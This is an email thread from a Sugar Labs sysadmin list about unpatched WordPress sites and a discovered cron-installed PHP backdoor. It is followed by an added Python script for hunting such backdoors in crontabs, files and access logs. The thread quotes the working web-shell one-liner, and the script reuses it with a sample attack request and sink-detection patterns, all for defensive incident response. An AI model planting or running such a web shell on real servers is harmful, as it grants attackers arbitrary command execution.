<div dir="ltr">Let's shut it down for the time being. I've been updating the wiki but not my blog since the attack last year anyway.<div><br></div><div>-walter</div></div><div class="gmail_extra"><br><div class="gmail_quote">On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <span dir="ltr"><<a href="mailto:bernie@codewiz.org" target="_blank">bernie@codewiz.org</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">+walter<br>
<br>
Can we appoint an official maintainer for <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a>? Sorry for<br>
not stepping up myself, but I'm overwhelmed by work related things and<br>
trying to reduce my sysadmin load.<br>
<br>
On 03/01/2016 02:50 PM, Samuel Cantero wrote:<br>
> On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <<a href="mailto:bernie@codewiz.org">bernie@codewiz.org</a><br>
> <mailto:<a href="mailto:bernie@codewiz.org">bernie@codewiz.org</a>>> wrote:<br>
><br>
> On 02/25/2016 04:09 AM, Sebastian Silva wrote:<br>
> > Remember in June we had an incident with a broken Wordpress site.<br>
> > I switched to static generator since then.<br>
> ><br>
> > +1 on containers just learning more about them and finding them fascinating.<br>
> > Count me in on containerizing everything.<br>
> ><br>
> > I'm not aware of other wordpress sites. Maybe walter's blog?<br>
> > Wordpress is a PIA IMHO.<br>
><br>
> Yes, WP is riddled with security holes. Back in October, Samuel helped<br>
> Walter upgrade <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> on<br>
> sunjammer. Samuel, can you confirm<br>
> that the WP instance is now fully patched and locked down?<br>
><br>
><br>
> The WP version on <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> site is<br>
> 4.3.1. The latest WP version is 4.4.2. I have checked the WP change log<br>
> and we can find this:<br>
><br>
> 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site<br>
> scripting vulnerability that could allow a site to be compromised.<br>
><br>
> 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two<br>
> security issues: a possible SSRF for certain local URIs, and an open<br>
> redirection attack.<br>
><br>
> This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.<br>
> Significant information on the release notes:<br>
><br>
> * Pre-emptive security improvements to ensure that the Akismet plugin<br>
> can't be used by attackers to compromise a WordPress installation.<br>
> * Closes a potential XSS vulnerability.<br>
><br>
> Of course, every version has a lot of bug fixes. We definitely should<br>
> upgrade it and test that nothing breaks on the <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a><br>
> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> site.<br>
><br>
> Who is in charge of upgrading the other WP sites?<br>
><br>
> Regards,<br>
><br>
> Samuel C.<br>
><br>
><br>
><br>
><br>
> > Regards,<br>
> > Sebastian<br>
> ><br>
> ><br>
> > On 25/02/16 04:47, Bernie Innocenti wrote:<br>
> >> While I was looking for cronjobs in /var/spool/cron/crontabs/, I<br>
> found<br>
> >> that www-data was executing commands like these:<br>
> >><br>
> >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==<br>
> >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);<br>
> >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php<br>
> >><br>
> >> Did you spot the system()? This executes arbitrary commands specified<br>
> >> via the "localtime" url parameter. Uh-oh.<br>
> >><br>
> >> There were about a dozen lines like the above, installing<br>
> .cache.php in<br>
> >> various virtualhosts. I kept a copy of the file in<br>
> >> /root/www-data.backdoor. The file was last written on Jun 23 2015,<br>
> >> which may correlate with the switch to the new website.<br>
> >><br>
> >> I cleared the mess and searched the logs for requests containing<br>
> >> "localtime", but couldn't find any. I wonder if they could filter the<br>
> >> logs, since they were previously writable by www-data.<br>
> >><br>
> >> Please watch out. We should ensure directories accessible over<br>
> http are<br>
> >> not writable by user www-data, especially those in which PHP and CGIs<br>
> >> are enabled.<br>
> >><br>
> >> Running several large sites under the same uid has always been a bad<br>
> >> security practice, and looking forward we should keep migrating<br>
> them to<br>
> >> properly isolated containers.<br>
> >><br>
> >> Finally, Wordpress is particularly dangerous and we should update and<br>
> >> harden all instances. Can someone please take care of this? I'll do<br>
> >> Mediawiki, which I know pretty well.<br>
> >><br>
> ><br>
><br>
><br>
> --<br>
> _ // Bernie Innocenti<br>
> \X/ <a href="http://codewiz.org" rel="noreferrer" target="_blank">http://codewiz.org</a><br>
> _______________________________________________<br>
> Systems mailing list<br>
> <a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a> <mailto:<a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a>><br>
> <a href="http://lists.sugarlabs.org/listinfo/systems" rel="noreferrer" target="_blank">http://lists.sugarlabs.org/listinfo/systems</a><br>
><br>
><br>
><br>
><br>
> _______________________________________________<br>
> Systems mailing list<br>
> <a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a><br>
> <a href="http://lists.sugarlabs.org/listinfo/systems" rel="noreferrer" target="_blank">http://lists.sugarlabs.org/listinfo/systems</a><br>
><br>
<span class="HOEnZb"><font color="#888888"><br>
<br>
--<br>
_ // Bernie Innocenti<br>
\X/ <a href="http://codewiz.org" rel="noreferrer" target="_blank">http://codewiz.org</a><br>
</font></span></blockquote></div><br><br clear="all"><div><br></div>-- <br><div class="gmail_signature"><div dir="ltr"><div><font><font>Walter Bender</font></font><br><font><font>Sugar Labs</font></font></div><div><font><a href="http://www.sugarlabs.org" target="_blank"><font>http://www.sugarlabs.org</font></a></font><br><a href="http://www.sugarlabs.org" target="_blank"><font></font></a><br></div></div></div>
</div>
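The thread above describes three things a practitioner would want to automate: spotting the cron entry that re-drops the PHP backdoor, finding the dropped files and their lookalikes in every virtualhost, and searching the access logs for the backdoor's query parameters while checking which directories the web server's uid could write into. The script below is an added example, not code from the thread or from the Sugar Labs sysadmins. It reuses the cron line Bernie quoted as sample crontab text; the access-log lines, the web root, the file names and the uid 33 (www-data on Debian-style systems, assumed here) are constructed for illustration.

```python
"""Hunt for a cron-dropped PHP backdoor of the kind found on sunjammer.

Added example, not code from the thread or from Sugar Labs. SAMPLE_CRONTAB
reuses the cron line quoted in the thread; the log lines, paths and uid are
constructed assumptions.
"""
import os
import re
import stat
from urllib.parse import parse_qs, urlsplit

# 1. crontab entries of the form  <5 fields> echo '<?php ...?>' > /path/file.php
CRON_DROPPER = re.compile(
    r"^(?P<schedule>(?:\S+\s+){5})echo\s+'(?P<payload><\?php.*?\?>)'\s*>\s*(?P<target>\S+)$"
)

# First line: the entry quoted in the thread. Second line: a benign entry for contrast.
SAMPLE_CRONTAB = r"""*/27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
0 3 * * * /usr/bin/php /srv/www-somosazucar/blog/wp-cron.php
"""


def parse_cron_droppers(crontab_text):
    """Return (schedule, target_path, php_payload) for every entry that writes PHP via echo."""
    found = []
    for line in crontab_text.splitlines():
        m = CRON_DROPPER.match(line.strip())
        if m:
            found.append((m["schedule"].strip(), m["target"], m["payload"]))
    return found


# 2. file contents: a command/code sink in the same file as raw request input
SINKS = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I
)
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")


def suspicious_php(source):
    """Heuristic shortlist: flags a sink plus a request superglobal in one file.

    Deliberately crude (some legitimate plugins trip it); the goal is a short
    list for a human to read, which a hidden ".cache.php" will be on.
    """
    return bool(SINKS.search(source) and REQUEST_INPUT.search(source))


def scan_tree(root):
    """Walk a web root and return every *.php path (dotfiles included) that looks suspicious."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if suspicious_php(fh.read()):
                        flagged.append(path)
            except OSError:
                continue
    return sorted(flagged)


# 3. access log: requests for the dropped file name or carrying its query keys
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')

# Constructed log lines; addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2015:03:14:15 +0000] "GET /blog/.cache.php?localdate=x&localtime=id HTTP/1.1" 200 51',
    '198.51.100.9 - - [23/Jun/2015:03:15:02 +0000] "GET /blog/index.php HTTP/1.1" 200 8123',
    '203.0.113.7 - - [23/Jun/2015:03:16:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [23/Jun/2015:03:20:09 +0000] "GET /blog/.cache.php HTTP/1.1" 200 0',
]


def backdoor_requests(log_lines, dropped_names=(".cache.php",),
                      query_keys=("localdate", "localtime")):
    """Return log lines whose path is a dropped file or whose query uses the backdoor's keys."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        keys = set(parse_qs(url.query, keep_blank_values=True))
        if os.path.basename(url.path) in dropped_names or keys & set(query_keys):
            hits.append(line)
    return hits


# 4. permissions: which directories could the web server's uid write into?
def writable_by(uid, gids, st):
    """True if a process running as uid/gids could write the path described by stat result st."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def web_writable_dirs(root, uid, gids):
    """Directories under root writable by the web uid, i.e. where a dropper can land."""
    hits = []
    for dirpath, _dirs, _files in os.walk(root):
        try:
            if writable_by(uid, gids, os.stat(dirpath)):
                hits.append(dirpath)
        except OSError:
            continue
    return sorted(hits)


if __name__ == "__main__":
    import sys
    for schedule, target, payload in parse_cron_droppers(SAMPLE_CRONTAB):
        print(f"cron dropper ({schedule}) -> {target}; sink+input: {suspicious_php(payload)}")
    for line in backdoor_requests(SAMPLE_LOG):
        print("log hit:", line)
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    print("suspicious php:", scan_tree(root))
    print("web-writable dirs:", web_writable_dirs(root, 33, {33}))  # uid 33 assumed = www-data
```

Run it as `python3 hunt.py /srv/www-somosazucar` on the host and feed the real crontab and access logs to `parse_cron_droppers` and `backdoor_requests`. The log search only proves anything if the log files were not writable by www-data at the time, which is exactly the doubt raised in the thread; `web_writable_dirs` is the control for that, and any directory it lists under a PHP-enabled document root is one the backdoor (or a replacement) could be written into again.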